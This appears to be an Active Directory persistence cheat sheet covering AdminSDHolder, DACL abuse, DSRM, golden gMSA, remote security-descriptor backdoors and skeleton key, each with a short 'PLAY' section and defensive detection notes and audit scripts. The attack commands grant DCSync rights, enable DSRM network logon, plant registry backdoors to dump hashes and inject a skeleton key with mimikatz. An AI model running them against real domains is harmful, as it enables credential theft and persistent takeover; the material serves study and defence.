Techniques detailed at thehacker.recipes / ad / persistence
adminsdholder
🔑 KEYPOINTS :
- special AD container with some “default” security permissions that is used as a template for protected AD accounts and groups
- rolls back the security permissions of protected accounts and groups every 60 minutes; this is the Security Descriptor Propagator (SDProp) process
▶️ PLAY :
# grant the user full rights (GenericAll) on the AdminSDHolder object; SDProp then copies them to the protected accounts and groups
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName spotless -Verbose -Rights All
# check that the user now has GenericAll over the 'Domain Admins' group (once SDProp has run)
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
# add the user back to the 'Domain Admins' group
net group "domain admins" spotless /add /domain
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
🔎️ DETECT :
# find all users with security ACLs set by SDProp using the PowerShell AD cmdlets
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(admincount=1)(|(objectcategory=person)(objectcategory=group)))" -Properties MemberOf,Created,Modified,AdminCount
# monitor the ACLs configured on the AdminSDHolder object. These should be kept at the default – it is not usually necessary to add other groups to the AdminSDHolder ACL.
# monitor users and groups with AdminCount = 1 to identify accounts with ACLs set by SDProp.
🛟 MITIGATE :
🕮 READ MORE at :
- thehacker.recipes/ad/persistence/adminsdholder
- ired.team/abuse-adminsdholder
- adsecurity.org/adminsdholder
dacl-abuse
🔑 KEYPOINTS :
▶️ PLAY :
# as DA add dcsync rights to a low-level user
Add-DomainObjectAcl -TargetIdentity $ztarg_ou -PrincipalIdentity $ztarg_user_name -Rights DCSync -PrincipalDomain $zdom_fqdn -TargetDomain $zdom_fqdn -Verbose
🔎️ DETECT :
# monitor for users added to privileged groups
# shadow credentials: monitor writes to the msDS-KeyCredentialLink attribute
🛟 MITIGATE :
🕮 READ MORE at :
- thehacker.recipes/ad/movement/dacl
- thehacker.recipes/ad/persistence/dacl
- ired.team/abusing-active-directory-acls-aces
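Audit script added here as an example for both the AdminSDHolder and the DACL sections (not from the page or from PowerView): it lists ACEs on AdminSDHolder and on the domain root held by non-default trustees, plus every holder of the replication (DCSync) extended rights. $ExpectedTrustees is an assumed baseline; tune it to the forest before trusting the output.

```powershell
Import-Module ActiveDirectory   # provides the AD: drive that Get-Acl reads below

# Extended-right GUIDs that together grant DCSync
$ReplicationGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Trustees expected on these objects by default (assumed baseline; '*\' matches the domain prefix)
$ExpectedTrustees = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'NT AUTHORITY\Authenticated Users', 'BUILTIN\Administrators', 'BUILTIN\Account Operators',
    'BUILTIN\Pre-Windows 2000 Compatible Access', 'BUILTIN\Terminal Server License Servers',
    'BUILTIN\Windows Authorization Access Group', 'BUILTIN\Incoming Forest Trust Builders',
    '*\Domain Admins', '*\Enterprise Admins', '*\Domain Controllers', '*\Cert Publishers',
    '*\Enterprise Read-only Domain Controllers', '*\Read-only Domain Controllers',
    '*\Key Admins', '*\Enterprise Key Admins'
)

function Get-SuspiciousAce {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $trustee   = $ace.IdentityReference.Value
        $known     = [bool]($ExpectedTrustees | Where-Object { $trustee -like $_ })
        $replRight = $ReplicationGuids[$ace.ObjectType.ToString()]   # $null unless a replication right
        # Report unknown trustees, and every replication right so all DCSync holders get reviewed
        if (-not $known -or $replRight) {
            [pscustomobject]@{
                Object        = $DistinguishedName
                Trustee       = $trustee
                Rights        = $ace.ActiveDirectoryRights
                ExtendedRight = $replRight
                Inherited     = $ace.IsInherited
            }
        }
    }
}

$domainDn = (Get-ADDomain).DistinguishedName
@(
    Get-SuspiciousAce -DistinguishedName "CN=AdminSDHolder,CN=System,$domainDn"
    Get-SuspiciousAce -DistinguishedName $domainDn
) | Format-Table -AutoSize
```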
dc-shadow
🔑 KEYPOINTS :
- tbd
▶️ PLAY :
🔎️ DETECT :
🛟 MITIGATE :
🕮 READ MORE at :
dsrm
🔑 KEYPOINTS :
- DSRM stands for ‘Directory Services Restore Mode’
- allows the DC's local DSRM administrator account to be used for remote (network) logon
- requires dumping the DSRM local administrator's hash and enabling the feature in the registry
▶️ PLAY :
# check if the key exists and get the value
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior
# create the value (set to 2) if it doesn't exist
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD
# change value to "2"
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
🔎️ DETECT :
# EID: 4657 - Registry value modified
# EID: 12 - Registry Object Created/Deletion (sysmon)
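Added example, not part of the page: check every DC for the DSRM network-logon setting and pull the Security events (EID 4657) that changed it. Assumes the ActiveDirectory module, WinRM access to the DCs, and that "Audit Registry" is enabled with a SACL on the Lsa key (otherwise 4657 is never written).

```powershell
Import-Module ActiveDirectory

$LsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$ValueName = 'DsrmAdminLogonBehavior'

function Get-DsrmLogonSetting {
    param([string[]]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        param($Key, $Name)
        $value = (Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue).$Name
        # Absent or 0 is the default (DSRM admin usable only in DSRM itself); 1 allows logon while
        # the DS service is stopped; 2 allows network logon at any time, the setting set above.
        $status = if ($null -eq $value -or $value -eq 0) { 'default' } else { 'REVIEW' }
        [pscustomobject]@{ DC = $env:COMPUTERNAME; Value = $value; Status = $status }
    } -ArgumentList $LsaKey, $ValueName
}

function Get-DsrmRegistryChangeEvent {
    param([string[]]$ComputerName, [int]$Days = 30)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        param($Name, $Days)
        $filter = @{ LogName = 'Security'; Id = 4657; StartTime = (Get-Date).AddDays(-$Days) }
        Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
            # Read the named fields from the event XML instead of regexing the message text
            $x = [xml]$_.ToXml(); $d = @{}
            foreach ($e in $x.Event.EventData.Data) { $d[$e.Name] = $e.'#text' }
            if ($d.ObjectValueName -eq $Name) {
                [pscustomobject]@{
                    DC = $env:COMPUTERNAME; Time = $_.TimeCreated
                    Subject = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                    Old = $d.OldValue; New = $d.NewValue; Process = $d.ProcessName
                }
            }
        }
    } -ArgumentList $ValueName, $Days
}

$dcs = (Get-ADDomainController -Filter *).HostName
Get-DsrmLogonSetting -ComputerName $dcs | Format-Table -AutoSize
Get-DsrmRegistryChangeEvent -ComputerName $dcs | Format-Table -AutoSize
```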
🛟 MITIGATE :
🕮 READ MORE at :
golden-gmsa
🔑 KEYPOINTS :
- Group Managed Service Accounts (gMSA), which are managed directly by AD, with a strong password and a regular password rotation
- passwords are computed from the KDS root keys and the gMSA account's ‘msDS-ManagedPassword’ attribute value
- hack implemented by the semperis/goldenGMSA tool
▶️ PLAY :
# enumerate KDS root keys, SID, RootKeyGuid, Password ID
GoldenGMSA.exe gmsainfo
# enumeration for a single gMSA
GoldenGMSA.exe gmsainfo --sid "S-1-5-21-[...]1586295871-1112"
🔎️ DETECT :
🛟 MITIGATE :
🕮 READ MORE at :
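Added example, not part of the page or of the GoldenGMSA tool: audit who may retrieve each gMSA's managed password and who can read the KDS root key container (the key material a Golden gMSA needs). Assumes the ActiveDirectory module (AD: drive) and a domain account that can read the configuration partition.

```powershell
Import-Module ActiveDirectory

# Principals that should never be allowed to retrieve a service account password
$BroadPrincipals = @('Domain Users', 'Domain Computers', 'Authenticated Users', 'Everyone')

function Get-GmsaRetrievalAudit {
    $gmsaFilter = 'objectClass -eq "msDS-GroupManagedServiceAccount"'
    Get-ADServiceAccount -Filter $gmsaFilter -Properties PrincipalsAllowedToRetrieveManagedPassword |
        ForEach-Object {
            $gmsa = $_
            foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
                $p    = Get-ADObject -Identity $dn -Properties sAMAccountName
                $name = $p.sAMAccountName.TrimEnd('$')   # computer accounts carry a trailing $
                $flag = if ($BroadPrincipals -contains $name) { 'BROAD' } else { '' }
                [pscustomobject]@{ gMSA = $gmsa.SamAccountName; Principal = $name
                                   Type = $p.ObjectClass; Flag = $flag }
            }
        }
}

function Get-KdsRootKeyReader {
    $configNc  = (Get-ADRootDSE).configurationNamingContext
    $container = "CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,$configNc"
    # ReadProperty (0x10) is also part of GenericAll; GenericRead (0x80000000) covers the rest
    $readMask = [int][System.DirectoryServices.ActiveDirectoryRights]::ReadProperty -bor
                [int][System.DirectoryServices.ActiveDirectoryRights]::GenericRead
    # Anyone beyond SYSTEM, Domain Admins and Enterprise Admins in this list deserves a question
    (Get-Acl -Path "AD:\$container").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       (([int]$_.ActiveDirectoryRights -band $readMask) -ne 0) } |
        Select-Object @{ n = 'Trustee'; e = { $_.IdentityReference.Value } },
                      ActiveDirectoryRights, IsInherited
}

Get-GmsaRetrievalAudit | Format-Table -AutoSize
Get-KdsRootKeyReader   | Format-Table -AutoSize
```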
security-descriptors
🔑 KEYPOINTS :
▶️ PLAY :
DCOM
# set-RemoteDCOM
Powershell
# grant PS remote execution to a user
Set-RemotePSRemoting -UserName $ztarg_user_name -ComputerName $zdom_dc_name -Verbose
# remove the grant of PS remote execution
Set-RemotePSRemoting -UserName $ztarg_user_name -ComputerName $zdom_dc_name -Verbose -Remove
Registry
# Add-RemoteRegBackdoor allows the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName $zdom_dc_name -Trustee $ztarg_user_name -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName $zdom_dc_name -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName $zdom_dc_name -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName $zdom_dc_name -Verbose
SC Manager
- DEMO SCM backdoor / service creation
WMI
# grant WMI remote execution to a user
Set-RemoteWMI -UserName $ztarg_user_name -ComputerName $zdom_dc_name -namespace 'root\cimv2' -Verbose
# remove the grant of WMI remote execution
Set-RemoteWMI -UserName $ztarg_user_name -ComputerName $zdom_dc_name -namespace 'root\cimv2' -Remove -Verbose
🕮 READ MORE at :
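Added example, not from the page or from the tools whose cmdlets it lists: audit a host for the kind of remote-access grants the backdoors above create. It reports non-default trustees on the remote-registry keys, on the PowerShell session configurations and on the root/cimv2 WMI namespace; the three $Default* baselines are assumptions to tune, and it runs locally as an administrator (or inside Invoke-Command).

```powershell
$DefaultRegistry = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'BUILTIN\Backup Operators',
                     'NT AUTHORITY\LOCAL SERVICE', 'BUILTIN\Users')
$DefaultWinRm    = @('BUILTIN\Administrators', 'BUILTIN\Remote Management Users', 'NT AUTHORITY\INTERACTIVE')
$DefaultWmi      = @('BUILTIN\Administrators', 'NT AUTHORITY\NETWORK SERVICE',
                     'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\Authenticated Users')

function Get-RegistryExtraTrustee {
    # Keys that gate remote registry access and hold the SAM / LSA secrets
    $keys = @('HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg',
              'HKLM:\SAM', 'HKLM:\SECURITY', 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa')
    foreach ($k in $keys) {
        $acl = Get-Acl -Path $k -ErrorAction SilentlyContinue
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -eq 'Allow' -and $DefaultRegistry -notcontains $ace.IdentityReference.Value) {
                [pscustomobject]@{ Location = $k; Trustee = $ace.IdentityReference.Value; Rights = $ace.RegistryRights }
            }
        }
    }
}

function Get-WinRmExtraTrustee {
    foreach ($cfg in Get-PSSessionConfiguration) {
        # Permission reads like "BUILTIN\Administrators AccessAllowed, BUILTIN\Remote Management Users AccessAllowed"
        foreach ($entry in ($cfg.Permission -split ',\s*')) {
            if ($entry -match '^(?<who>.+?)\s+(?<type>Access\w+)$' -and $Matches.type -eq 'AccessAllowed' -and
                $DefaultWinRm -notcontains $Matches.who) {
                [pscustomobject]@{ Location = "WinRM:$($cfg.Name)"; Trustee = $Matches.who; Rights = $Matches.type }
            }
        }
    }
}

function Get-WmiExtraTrustee {
    param([string]$Namespace = 'root/cimv2')
    $sd = (Invoke-CimMethod -Namespace $Namespace -ClassName __SystemSecurity -MethodName GetSecurityDescriptor).Descriptor
    foreach ($ace in $sd.DACL) {
        $who = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
        if ($ace.AceType -eq 0 -and $DefaultWmi -notcontains $who) {    # AceType 0 = access allowed
            [pscustomobject]@{ Location = "WMI:$Namespace"; Trustee = $who; Rights = ('0x{0:X}' -f $ace.AccessMask) }
        }
    }
}

@(Get-RegistryExtraTrustee; Get-WinRmExtraTrustee; Get-WmiExtraTrustee) | Format-Table -AutoSize
```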
skeleton-key
🔑 KEYPOINTS :
- hack that injects a master password into the lsass process on a DC
- enables the adversary to authenticate as any user without password
- does not survive a reboot
▶️ PLAY :
# execution on a DC
invoke-mimi 'misc::skeleton'
🔎️ DETECT :
🛟 MITIGATE :
🕮 READ MORE at :
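Added example, not part of the page: hunt on the DCs for the Kerberos encryption downgrade a skeleton key causes. Logons through the injected master password are issued RC4-HMAC (0x17) tickets, so an AES-capable account showing up with RC4 in EID 4768 is worth a look. Assumes the ActiveDirectory module, WinRM to the DCs, and that "Audit Kerberos Authentication Service" success auditing is enabled.

```powershell
Import-Module ActiveDirectory

$AesFlags = 0x18   # msDS-SupportedEncryptionTypes bits: 0x8 = AES128, 0x10 = AES256

function Get-Rc4TgtRequest {
    param([string[]]$DomainController, [int]$Hours = 24)
    Invoke-Command -ComputerName $DomainController -ScriptBlock {
        param($Hours)
        $filter = @{ LogName = 'Security'; Id = 4768; StartTime = (Get-Date).AddHours(-$Hours) }
        Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
            $x = [xml]$_.ToXml(); $d = @{}
            foreach ($e in $x.Event.EventData.Data) { $d[$e.Name] = $e.'#text' }
            # Keep only successful TGT requests that were issued with RC4-HMAC
            if ($d.Status -eq '0x0' -and $d.TicketEncryptionType -eq '0x17') {
                [pscustomobject]@{ DC = $env:COMPUTERNAME; Time = $_.TimeCreated
                                   Account = $d.TargetUserName; Client = $d.IpAddress }
            }
        }
    } -ArgumentList $Hours
}

function Find-SkeletonKeyIndicator {
    param([string[]]$DomainController, [int]$Hours = 24)
    $encTypes = @{}   # sAMAccountName -> msDS-SupportedEncryptionTypes, cached for this run
    foreach ($req in Get-Rc4TgtRequest -DomainController $DomainController -Hours $Hours) {
        if (-not $encTypes.ContainsKey($req.Account)) {
            $obj = Get-ADObject -LDAPFilter "(sAMAccountName=$($req.Account))" -Properties 'msDS-SupportedEncryptionTypes'
            # Unset means the account still defaults to RC4, so RC4 tickets are expected for it
            $encTypes[$req.Account] = [int]($obj.'msDS-SupportedEncryptionTypes' | Select-Object -First 1)
        }
        # An RC4 ticket for an account that advertises AES is the downgrade a skeleton key produces
        $suspicious = ($encTypes[$req.Account] -band $AesFlags) -ne 0
        [pscustomobject]@{ DC = $req.DC; Time = $req.Time; Account = $req.Account
                           Client = $req.Client; Suspicious = $suspicious }
    }
}

$dcs = (Get-ADDomainController -Filter *).HostName
Find-SkeletonKeyIndicator -DomainController $dcs | Where-Object Suspicious | Format-Table -AutoSize
```

Legitimate RC4 use by AES-capable accounts (old clients, explicit etype restrictions) will also surface here, so treat a hit as a lead to correlate with LSASS access on the same DC rather than as proof on its own.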